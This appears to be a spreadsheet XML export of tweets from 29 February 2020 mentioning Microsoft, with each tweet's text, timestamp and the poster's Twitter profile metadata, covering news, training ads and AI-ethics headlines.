    <t>{'id': 95218114, 'id_str': '95218114', 'name': 'Ali Zartash-Lloyd', 'screen_name': 'Cognisant2000', 'location': 'Malaga', 'description': 'Experienced Business Leader escaped from large multinationals to run own businesses (Yes 3 of them!). Small is beautiful! https://t.co/kFrQEdvxqd', 'url': 'https://t.co/ByqOuC49ib', 'entities': {'url': {'urls': [{'url': 'https://t.co/ByqOuC49ib', 'expanded_url': 'http://www.cognisant-hosting.com', 'display_url': 'cognisant-hosting.com', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/kFrQEdvxqd', 'expanded_url': 'http://tinyurl.com/6gfqn63', 'display_url': 'tinyurl.com/6gfqn63', 'indices': [122, 145]}]}}, 'protected': False, 'followers_count': 569, 'friends_count': 347, 'listed_count': 150, 'created_at': 'Mon Dec 07 15:14:36 +0000 2009', 'favourites_count': 1225, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 26142,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'http://pbs.twimg.com/profile_images/479652486806904832/u9M5aNOk_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/479652486806904832/u9M5aNOk_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/95218114/1403193428',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</si>
  <si>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Sat Feb 29 12:10:21 +0000 2020</t>
  </si>
  <si>
    <t>Biggest Companies WORLDWIDE  2016 - 2019 
#Apple #Google #Microsoft  https://t.co/z28w8vI9fc</t>
  </si>
  <si>
    <t>{'id': 1110048234037219328, 'id_str': '1110048234037219328', 'name': 'Tech Score', 'screen_name': 'TechScoreNY', 'location': 'New York, NY', 'description': 'Tech Score | SHOP Tech Deals. EARN Reward Points. WIN free prizes.', 'url': 'https://t.co/YPiI7QaQtL', 'entities': {'url': {'urls': [{'url': 'https://t.co/YPiI7QaQtL', 'expanded_url': 'http://www.tech-score.com/', 'display_url': 'tech-score.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2802, 'friends_count': 1771, 'listed_count': 3, 'created_at': 'Mon Mar 25 05:18:17 +0000 2019', 'favourites_count': 20797, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2705,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'http://pbs.twimg.com/profile_images/1205008959574331395/CZHToVNm_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1205008959574331395/CZHToVNm_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1110048234037219328/1553492920',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</si>
  <si>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12:08:14 +0000 2020</t>
  </si>
  <si>
    <t xml:space="preserve"> Microsoft antivirus software for Android, iOS a reflection of the times #hamiltonbarnes #ios #microsoft #Android https://t.co/q7ZjaKu0fh https://t.co/NUhCzU17Dc</t>
  </si>
  <si>
    <t>{'id': 2494052718, 'id_str': '2494052718', 'name': 'Hamilton Barnes', 'screen_name': 'Hamilton_Barnes', 'location': 'London', 'description': 'We specialise in placing network &amp; security professionals within pioneering technology organisations #cisco #networks', 'url': 'https://t.co/HhU8J4Gbas', 'entities': {'url': {'urls': [{'url': 'https://t.co/HhU8J4Gbas', 'expanded_url': 'http://hamilton-barnes.co.uk/#jobs', 'display_url': 'hamilton-barnes.co.uk/#jobs', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1338, 'friends_count': 2578, 'listed_count': 110, 'created_at': 'Wed May 14 11:27:27 +0000 2014', 'favourites_count': 3579, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 5645,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'http://pbs.twimg.com/profile_images/948215729869946880/BHNtxbt8_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/948215729869946880/BHNtxbt8_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2494052718/1514907247',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</si>
  <si>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12:07:49 +0000 2020</t>
  </si>
  <si>
    <t>If there's one thing #Microsoft knows, it's viruses. https://t.co/LyuM5ONC6G</t>
  </si>
  <si>
    <t>{'id': 950469782, 'id_str': '950469782', 'name': 'History Author Show', 'screen_name': 'HistoryDean', 'location': 'New York City, NY', 'description': 'Your #iHeartRadio time machine! Free bourbon yesterday. iTunes: https://t.co/msL9ca5svTâ€¦', 'url': 'https://t.co/ltBcqFVGag', 'entities': {'url': {'urls': [{'url': 'https://t.co/ltBcqFVGag', 'expanded_url': 'http://HistoryAuthor.com', 'display_url': 'HistoryAuthor.com', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/msL9ca5svT', 'expanded_url': 'http://itunes.apple.com/us/podcast/his', 'display_url': 'itunes.apple.com/us/podcast/his', 'indices': [64, 87]}]}}, 'protected': False, 'followers_count': 13351, 'friends_count': 10071, 'listed_count': 352, 'created_at': 'Thu Nov 15 21:02:24 +0000 2012', 'favourites_count': 9624, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 47885, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '003366', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme14/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme14/bg.gif', 'profile_background_tile': True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/948547688999550976/u57Jwqn7_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/948547688999550976/u57Jwqn7_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/950469782/1576941509', 'profile_link_color': 'FAB81E',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</si>
  <si>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Sat Feb 29 12:07:10 +0000 2020</t>
  </si>
  <si>
    <t>Happening now!!! ISACA Lagos Chapter Auditing Active Directory Training. 
#ISACA50 #Audit #Activedirectory #ISACALAGOSCPE #microsoft https://t.co/KFdPJGq9Qy</t>
  </si>
  <si>
    <t>{'id': 4414462103, 'id_str': '4414462103', 'name': 'ISACA LAGOS CHAPTER', 'screen_name': 'ISACALAGOS149', 'location': '', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 206, 'friends_count': 30, 'listed_count': 2, 'created_at': 'Tue Dec 08 09:52:50 +0000 2015', 'favourites_count': 14, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 381,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'http://pbs.twimg.com/profile_images/892712770977878016/BMwjmDRM_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/892712770977878016/BMwjmDRM_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/4414462103/1559816794',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</si>
  <si>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12:05:26 +0000 2020</t>
  </si>
  <si>
    <t>#IBM,  #Microsoft &amp;amp; #vatican leads the way for #EthicalAI. I hope all industries and countries will follow. It is not anymore the advancement of AI technology which has already been proven but rather how to use it and for what. https://t.co/vQ48v5rnrf</t>
  </si>
  <si>
    <t>{'id': 199365358, 'id_str': '199365358', 'name': 'Hazem Nabil', 'screen_name': 'hazemnabil2010', 'location': 'Cairo, Egypt', 'description': '| Public Sector Leader at #IBM @IBM_Egypt @IBMMEA | Studied @AUC | All tweets are my own | Executive Consultant &amp; Sales and Football Fan', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 195, 'friends_count': 723, 'listed_count': 0, 'created_at': 'Wed Oct 06 17:45:13 +0000 2010', 'favourites_count': 99, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 399,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'http://pbs.twimg.com/profile_images/436090399447195648/IiXc6FzX_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/436090399447195648/IiXc6FzX_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/199365358/1392793244', 'profile_link_color': '0DAAE3',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</si>
  <si>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12:01:20 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft is retiring its #MCSA, #MCSD and #MCSE certifications in June 2020
https://t.co/WDwhrOthWU</t>
  </si>
  <si>
    <t>{'id': 394221712, 'id_str': '394221712', 'name': 'Yury Fedorov', 'screen_name': 'FedorovYury', 'location': 'Zug, Switzerland', 'description': 'Backend Software Developer: .NET, OOP (C#, C++, Java), FP (F#, Scala), DDD, TDD, Reactive, Refactoring, DevOps, Oracle', 'url': 'https://t.co/om2FHRUEph', 'entities': {'url': {'urls': [{'url': 'https://t.co/om2FHRUEph', 'expanded_url': 'http://www.linkedin.com/profile/view?id=27081325&amp;trk=tab_pro', 'display_url': 'linkedin.com/profile/view?iâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 98, 'friends_count': 979, 'listed_count': 0, 'created_at': 'Wed Oct 19 19:13:18 +0000 2011', 'favourites_count': 245, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 586,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'http://pbs.twimg.com/profile_images/1153417322381680641/DhO9oz7B_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1153417322381680641/DhO9oz7B_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/394221712/1563831458',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</si>
  <si>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12:01:12 +0000 2020</t>
  </si>
  <si>
    <t>Diversity and Inclusion in a company is not about making someone the 'other'... https://t.co/NhMJOj8etm #Microsoft @donasarkar #ADifferentMe https://t.co/NfXTBs5q7T</t>
  </si>
  <si>
    <t>{'id': 19029296, 'id_str': '19029296', 'name': 'EuroSTAR Conferences', 'screen_name': 'esconfs', 'location': '', 'description': "Europe's Largest #SoftwareTesting Conference since 1993. Join us at our 28th conference in Antwerp,  Belgium, 16-19 Nov 2020 #EuroSTARConf", 'url': 'https://t.co/Zpv6FBIW9G', 'entities': {'url': {'urls': [{'url': 'https://t.co/Zpv6FBIW9G', 'expanded_url': 'http://eurostarsoftwaretesting.com/', 'display_url': 'eurostarsoftwaretesting.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 6455, 'friends_count': 3474, 'listed_count': 376, 'created_at': 'Thu Jan 15 17:17:31 +0000 2009', 'favourites_count': 5523, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 25990, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'FCFEFF', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme4/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme4/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1195052007477956608/dLaRh0ZI_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1195052007477956608/dLaRh0ZI_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/19029296/1573757578', 'profile_link_color': '00ADEF', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': 'F9FCFC', 'profile_text_color': '3C3940', 'profile_use_background_image': True, 'has_extended_profile': True, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Sat Feb 29 12:00:26 +0000 2020</t>
  </si>
  <si>
    <t>Artificial Intelligence is helping Microsoft rethink Office for mobile https://t.co/4z6Y6gSh32 #ai #ArtificialIntelligence #algorithms #MachineLearning #microsoft https://t.co/wUmqqWybZV</t>
  </si>
  <si>
    <t>Sat Feb 29 12:00:07 +0000 2020</t>
  </si>
  <si>
    <t>Our #CVP  @ajohnsocyber on how to create a culture where people are your best defense. #Microsoft #CyberSecurity #RSA https://t.co/nCVRf1uuuB #MSFTAdvocate</t>
  </si>
  <si>
    <t>Sat Feb 29 11:59:54 +0000 2020</t>
  </si>
  <si>
    <t>Next session with @D365Geek ... Looking forward to this one!! 
#MSDyn365 #PowerPlatform #PowerAddicts #Microsoft #SS2020 #ScottishSummit https://t.co/nqRsjGwMco</t>
  </si>
  <si>
    <t>Sat Feb 29 11:55:05 +0000 2020</t>
  </si>
  <si>
    <t>Do you want to be an expert in MCSE and MCSA? 
Then, KR Network Cloud is best place for you. Microsoft is the path to reach your Goals.
Date: 16th Feb 2020
Timing: 03 AM To 05 PM
https://t.co/cQVcm6l5V0
8800272669, 9555378418
.
#KRNETWORKCLOUD #website #Microsoft #MCSE #MCSA https://t.co/rsj878t1T8</t>
  </si>
  <si>
    <t>{'id': 1177449634244878338, 'id_str': '1177449634244878338', 'name': 'KR NETWORK CLOUD HR TEAM', 'screen_name': 'HRTEAMKR', 'location': 'India', 'description': 'KR Network Cloud is a trusted name in IT education with 10 years of excellence. we Guarantee 100% placements to our Students.', 'url': 'https://t.co/Qeb7LjSJiM', 'entities': {'url': {'urls': [{'url': 'https://t.co/Qeb7LjSJiM', 'expanded_url': 'http://www.krnetworkcloud.org/', 'display_url': 'krnetworkcloud.org', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 5, 'friends_count': 26, 'listed_count': 0, 'created_at': 'Fri Sep 27 05:07:44 +0000 2019', 'favourites_count': 1,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'http://pbs.twimg.com/profile_images/1209022113975111681/0PN1Cq-P_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1209022113975111681/0PN1Cq-P_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1177449634244878338/1577087928',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</si>
  <si>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11:45:03 +0000 2020</t>
  </si>
  <si>
    <t>TRACK X
@enriquecatala
 Hablando de SQL!
#netcoreconf #netcore #Azure #Microsoft #Cloud #Xamarin #net #IA #BigData #IoT #Valencia https://t.co/ZaspOXcK4G</t>
  </si>
  <si>
    <t>Sat Feb 29 11:44:27 +0000 2020</t>
  </si>
  <si>
    <t>30 years ago but always with the same passion: #computer :-)
In that day I was using an #IBM #PS1 running #microsoft #MSDOS 5 (despite the computer originally came with #PCDOS 4 in ROM) ... when I first installed #Windows 3.1 it was like to discover a new world :-) https://t.co/dOnEfn2tIk</t>
  </si>
  <si>
    <t>{'id': 41650387, 'id_str': '41650387', 'name': 'Gennaro', 'screen_name': 'gennaro_tangari', 'location': 'MÃ¼nchen', 'description': 'Managing Consultant at @NTTDATA &amp; former @Microsoft #Dev #PFE &amp; Escalation Engineer. Opinions and views are my own ðŸ‡®ðŸ‡¹. WebSite https://t.co/NgneIdNJB5', 'url': 'https://t.co/DHJVDpnvjl', 'entities': {'url': {'urls': [{'url': 'https://t.co/DHJVDpnvjl', 'expanded_url': 'https://www.linkedin.com/in/gennaroeduardotangari/', 'display_url': 'linkedin.com/in/gennaroeduaâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/NgneIdNJB5', 'expanded_url': 'http://gennarotangari.com', 'display_url': 'gennarotangari.com', 'indices': [127, 150]}]}}, 'protected': False, 'followers_count': 208, 'friends_count': 173, 'listed_count': 15, 'created_at': 'Thu May 21 18:55:41 +0000 2009', 'favourites_count': 6984, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 6251,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'http://pbs.twimg.com/profile_images/1234941780480622594/MYBQhjsM_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1234941780480622594/MYBQhjsM_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/41650387/1583268166',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</si>
  <si>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Sat Feb 29 11:37:28 +0000 2020</t>
  </si>
  <si>
    <t>Do you want to be an expert in MCSE and MCSA? 
Then, KR Network Cloud is best place for you. 
Get Microsoft Training with Certification. 
16th Feb 2020
03 AM To 05 PM
https://t.co/uccswdfksG
8800272669, 9555378418
.
#KRNETWORKCLOUD #website #Microsoft #MCSE #MCSA #MCSETraining https://t.co/nx6S6RTUJ5</t>
  </si>
  <si>
    <t>{'id': 4363284373, 'id_str': '4363284373', 'name': 'KR Network Cloud', 'screen_name': 'krnetworkcloud1', 'location': 'New Delhi, Delhi', 'description': 'Welcome To, KR Network Cloud Technologies Pvt. ltd. which is a conspicuous name among Linux training providers of country.\nContact : 9555378418', 'url': 'https://t.co/Qeb7LjSJiM', 'entities': {'url': {'urls': [{'url': 'https://t.co/Qeb7LjSJiM', 'expanded_url': 'http://www.krnetworkcloud.org/', 'display_url': 'krnetworkcloud.org', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 184, 'friends_count': 71, 'listed_count': 1, 'created_at': 'Thu Nov 26 04:55:07 +0000 2015', 'favourites_count': 106, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 949,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'http://pbs.twimg.com/profile_images/834266868668051456/Bqzq2kMT_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/834266868668051456/Bqzq2kMT_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/4363284373/1487740439',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</si>
  <si>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11:27:09 +0000 2020</t>
  </si>
  <si>
    <t>Sat Feb 29 11:26:56 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft Office App now supports #Android dual-screen phones.  https://t.co/OPWNF7FIGG</t>
  </si>
  <si>
    <t>Sat Feb 29 11:25:17 +0000 2020</t>
  </si>
  <si>
    <t>Do Office 365 and Dynamics 365 work on Feb 29th?
#Microsoft #Office365 #dynamics365 #MSDyn365</t>
  </si>
  <si>
    <t>{'id': 18632206, 'id_str': '18632206', 'name': 'Mirko Bonello', 'screen_name': 'mirkob', 'location': 'Swieqi (MT)', 'description': 'CTO at Bluefort interested in topics concerning modern Retail, e-Commerce, AI and IoT.', 'url': 'https://t.co/hAKkV8Y4HG', 'entities': {'url': {'urls': [{'url': 'https://t.co/hAKkV8Y4HG', 'expanded_url': 'http://www.bluefort.com.mt', 'display_url': 'bluefort.com.mt', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 72, 'friends_count': 216, 'listed_count': 10, 'created_at': 'Mon Jan 05 14:06:37 +0000 2009', 'favourites_count': 140, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 331,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'http://pbs.twimg.com/profile_images/1214471394744045570/yXHnK9K5_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1214471394744045570/yXHnK9K5_normal.jpg', 'profile_link_color': '9DDD95', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': '1A3F57', 'profile_text_color': '72B9BF', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Sat Feb 29 11:16:04 +0000 2020</t>
  </si>
  <si>
    <t>ISACA Lagos Chapter Auditing Active Directory Training. 
#ISACA50 #Audit #Activedirectory #ISACALAGOSCPE #microsoft https://t.co/AxA6wG8NrG</t>
  </si>
  <si>
    <t>Sat Feb 29 11:15:11 +0000 2020</t>
  </si>
  <si>
    <t>#Google &amp;amp; #Microsoft Shift Production From China, Smartphones &amp;amp; computers are mostly manufactured in China. Production halted as economic paralysis caused factory shutdowns. Simply put: supply chains cannot be focused on one geographical region | https://t.co/bUe0e6vmh0</t>
  </si>
  <si>
    <t>{'id': 72635221, 'id_str': '72635221', 'name': 'bcom737', 'screen_name': 'bcom737', 'location': 'Global', 'description': 'Let your life be extraordinary.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 183, 'friends_count': 1470, 'listed_count': 4, 'created_at': 'Tue Sep 08 19:01:24 +0000 2009', 'favourites_count': 1826, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2668,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'http://pbs.twimg.com/profile_images/1175232244442701827/DEK63kdl_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1175232244442701827/DEK63kdl_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/72635221/1569008625', 'profile_link_color': '1B95E0',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</si>
  <si>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Sat Feb 29 11:06:23 +0000 2020</t>
  </si>
  <si>
    <t>When building the #ModernWorkplace or embarking on any transformational project, #security should be a priority. Find out how to build a modern workplace in your organisation in our short video series https://t.co/wUUrAxT97P
#Microsoft https://t.co/uRr6XIcrvY</t>
  </si>
  <si>
    <t>Sat Feb 29 11:00:24 +0000 2020</t>
  </si>
  <si>
    <t>Time to move onto 3.1!!
#Netcore #Microsoft #DevStyle #DevLife #Framework 
https://t.co/y6gPEYtOHs</t>
  </si>
  <si>
    <t>{'id': 38317305, 'id_str': '38317305', 'name': '|ELYOART|', 'screen_name': 'elyoart', 'location': 'MedellÃ­n, Colombia', 'description': 'ðŸ“¸ðŸƒðŸ½\u200dâ™€ðŸš²ðŸ‹ðŸ½\u200dâ™€ðŸ‘©ðŸ½\u200dðŸ’»ðŸðŸ¥‹\n#Photography, #foodie, #geek, #fit, #traveler, #Biker #Nikon', 'url': 'https://t.co/vlogJkOT9K', 'entities': {'url': {'urls': [{'url': 'https://t.co/vlogJkOT9K', 'expanded_url': 'http://about.me/elianaca', 'display_url': 'about.me/elianaca', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2420, 'friends_count': 2191, 'listed_count': 101, 'created_at': 'Thu May 07 00:16:51 +0000 2009', 'favourites_count': 2941, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 48085, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F2EEEF', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme3/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme3/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1216909591834955783/7pufq-Cg_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1216909591834955783/7pufq-Cg_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/38317305/1565709633', 'profile_link_color': 'FAB81E', 'profile_sidebar_border_color': '8BA7C4', 'profile_sidebar_fill_color': 'FAFAFA', 'profile_text_color': '8F2E2E', 'profile_use_background_image': False, 'has_extended_profile': True, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Sat Feb 29 10:59:31 +0000 2020</t>
  </si>
  <si>
    <t>#AI ethics backed by #Pope and tech giants in new plan - #BBC News https://t.co/D47F7FSEgO #Microsoft</t>
  </si>
  <si>
    <t>Sat Feb 29 10:52:15 +0000 2020</t>
  </si>
  <si>
    <t>SharePoint Api -&amp;gt; Office Graph -&amp;gt; Microsoft Graph https://t.co/4OecAbQrgu  #graph #development #api #Office365 #microsoft</t>
  </si>
  <si>
    <t>Sat Feb 29 10:45:53 +0000 2020</t>
  </si>
  <si>
    <t>I'm want to try #vscode again. Possibly #github too but, ugh, #microsoft. #developer #oss #anticorp #hardwork</t>
  </si>
  <si>
    <t>{'id': 2852415021, 'id_str': '2852415021', 'name': 'Robert', 'screen_name': 'roboticdinosaur', 'location': 'England, United Kingdom', 'description': 'All things nerdy. #London and #Stavanger #Norway. Avid @spursofficial supporter.  Logic is the correct way to deal with life.', 'url': 'https://t.co/XzJ0II2wUX', 'entities': {'url': {'urls': [{'url': 'https://t.co/XzJ0II2wUX', 'expanded_url': 'https://www.roboticdinosaur.co.uk', 'display_url': 'roboticdinosaur.co.uk', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 48, 'friends_count': 160, 'listed_count': 10, 'created_at': 'Thu Oct 30 23:05:24 +0000 2014', 'favourites_count': 406, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 748,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'http://pbs.twimg.com/profile_images/1119287737285263360/fkY4Ux4G_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1119287737285263360/fkY4Ux4G_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2852415021/1578191807',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</si>
  <si>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10:44:49 +0000 2020</t>
  </si>
  <si>
    <t>What's the best use for a dual-screen device? 
#Microsoft
#SurfaceDuo
#TechNave https://t.co/LGFre8VT6h</t>
  </si>
  <si>
    <t>{'id': 725874457584099330, 'id_str': '725874457584099330', 'name': 'TechNave', 'screen_name': 'technavemy', 'location': 'Malaysia', 'description': 'The official Twitter page for TechNave - Tech news &amp; reviews, compare of mobile phone specs, cameras, market price and telco plans.', 'url': 'https://t.co/MIDExf61Qz', 'entities': {'url': {'urls': [{'url': 'https://t.co/MIDExf61Qz', 'expanded_url': 'http://www.TechNave.com', 'display_url': 'TechNave.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 4677, 'friends_count': 90, 'listed_count': 61, 'created_at': 'Fri Apr 29 02:28:51 +0000 2016', 'favourites_count': 56, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 8203,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'http://pbs.twimg.com/profile_images/725878551333863424/jmH5k1ah_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/725878551333863424/jmH5k1ah_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/725874457584099330/1461897862',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</si>
  <si>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10:44:08 +0000 2020</t>
  </si>
  <si>
    <t>Yesterday marked the 21st anniversary of the founding of Microsoft India Development Centre, the first of its kind in the world outside the Silicon Valley. It was the harbinger of Cyberabad and rise of Hyderabad as an IT powerhouse.
#Microsoft #Hyderabad
https://t.co/QrqWGQX5UD</t>
  </si>
  <si>
    <t>{'id': 1230098210577760258, 'id_str': '1230098210577760258', 'name': 'Neti Andhra', 'screen_name': 'NetiAndhra2024', 'location': 'Amaravati || Andhra Pradesh', 'description': 'Current Issues, News and Politics of Andhra || https://t.co/V6pyg1cXpN', 'url': 'https://t.co/lsfcxfPv4d', 'entities': {'url': {'urls': [{'url': 'https://t.co/lsfcxfPv4d', 'expanded_url': 'http://netiandhra.com/', 'display_url': 'netiandhra.com', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/V6pyg1cXpN', 'expanded_url': 'http://www.netiandhra.com', 'display_url': 'netiandhra.com', 'indices': [47, 70]}]}}, 'protected': False, 'followers_count': 71, 'friends_count': 38, 'listed_count': 0, 'created_at': 'Wed Feb 19 11:54:18 +0000 2020', 'favourites_count': 1, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 28, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1233288682288730112/oz6_13T6_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1233288682288730112/oz6_13T6_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1230098210577760258/1582898584',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</si>
  <si>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10:43:49 +0000 2020</t>
  </si>
  <si>
    <t>Now generally available: #Managed #Service for #Microsoft #Active #Directory (AD) 
https://t.co/nox75zuaUh</t>
  </si>
  <si>
    <t>{'id': 960137537254842369, 'id_str': '960137537254842369', 'name': 'MichaÅ‚ Dobrowolski', 'screen_name': 'm_dobrowolski_', 'location': 'Bydgoszcz, Polska', 'description': "vExpert / Organizer's assistant at GDG Bydgoszcz / Organizer's assistant at Cloud &amp; Datacenter User Group Bydgoszcz / Blogger", 'url': 'https://t.co/CMyxZMmdsl', 'entities': {'url': {'urls': [{'url': 'https://t.co/CMyxZMmdsl', 'expanded_url': 'http://www.cmichal.com', 'display_url': 'cmichal.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 11, 'friends_count': 45, 'listed_count': 0, 'created_at': 'Sun Feb 04 13:06:42 +0000 2018', 'favourites_count': 206, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 415,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</si>
  <si>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Sat Feb 29 10:43:39 +0000 2020</t>
  </si>
  <si>
    <t>BM and Microsoft Sign Vaticans Call For AI Ethics https://t.co/JzLBqtZRMT #AI #AIEthics #IBM #Microsoft #PopeFrancis #Vatican https://t.co/dheLBNekBz</t>
  </si>
  <si>
    <t>{'id': 583602068, 'id_str': '583602068', 'name': 'Future Time', 'screen_name': 'futuretimedia', 'location': '', 'description': 'Media about tech trends shaping the future\nFollow us in Telegram: https://t.co/EBZSNCH2SQ', 'url': 'https://t.co/0zUBr6VYQp', 'entities': {'url': {'urls': [{'url': 'https://t.co/0zUBr6VYQp', 'expanded_url': 'https://futuretime.ai/', 'display_url': 'futuretime.ai', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/EBZSNCH2SQ', 'expanded_url': 'https://t.me/futuretimedia', 'display_url': 't.me/futuretimedia', 'indices': [66, 89]}]}}, 'protected': False, 'followers_count': 172, 'friends_count': 24, 'listed_count': 13, 'created_at': 'Fri May 18 08:33:20 +0000 2012', 'favourites_count': 50, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1566,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'http://pbs.twimg.com/profile_images/1216685514797076487/iKLm5oJC_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1216685514797076487/iKLm5oJC_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/583602068/1578915196',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</si>
  <si>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10:43:18 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft uses its expertise in #malware to help with fileless attack detection on #Linux https://t.co/6ViaQVlU5m A fileless attack tends to hit via a software vulnerability, inject a stinky payload into an otherwise fragrant system process and then lurk in memory. #ITSecurity https://t.co/82xo0xsDzQ</t>
  </si>
  <si>
    <t>Sat Feb 29 10:42:32 +0000 2020</t>
  </si>
  <si>
    <t>https://t.co/77k5LabwZd
